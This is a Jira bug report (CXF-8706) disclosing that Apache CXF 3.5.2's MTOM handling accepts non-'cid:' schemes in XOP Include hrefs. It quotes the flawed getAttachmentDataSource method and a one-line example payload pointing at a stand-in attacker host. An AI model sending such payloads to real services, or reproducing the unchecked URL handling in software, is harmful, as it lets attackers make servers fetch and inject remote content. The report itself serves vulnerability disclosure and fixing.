Chunqing Lin created CXF-8706:
---------------------------------
Summary: CXF MTOM handler allow content injection
Key: CXF-8706
URL: https://issues.apache.org/jira/browse/CXF-8706
Project: CXF
Issue Type: Bug
Components: JAXB Databinding
Affects Versions: 3.5.2
Reporter: Chunqing Lin
When used with SOAP web service or JAXRS web service with MTOM enabled,
Unmarshaller allows XOP Include tag to have href attributes that allow any
protocols. According to the W3C MTOM spec, only "cid:" should be allowed for
href scheme.
The affected call stack is:
AttachmentUtil.getAttachmentDataSource(String, Collection<Attachment>)
line: 554
JAXBAttachmentUnmarshaller.getAttachmentAsDataHandler(String) line: 49
MTOMDecorator.startElement(TagName) line: 70
The source code is:
public static DataSource getAttachmentDataSource(String contentId,
Collection<Attachment> atts) {
// Is this right? - DD
if (contentId.startsWith("cid:")) {
try {
contentId = URLDecoder.decode(contentId.substring(4),
StandardCharsets.UTF_8.name());
} catch (UnsupportedEncodingException ue) {
contentId = contentId.substring(4);
}
return loadDataSource(contentId, atts);
} else if (contentId.indexOf("://") == -1) {
return loadDataSource(contentId, atts);
} else {// should only take cid for XOP
try {
return new URLDataSource(new URL(contentId));
} catch (MalformedURLException e) {
throw new Fault(e);
}
}
}
The exploit can send payload containing:
<stringvalue><inc:Include href="http://attackers.site/exploit/payload";
xmlns:inc="http://www.w3.org/2004/08/xop/include"/><stringvalue>
--
This message was sent by Atlassian Jira
(v8.20.7#820007)
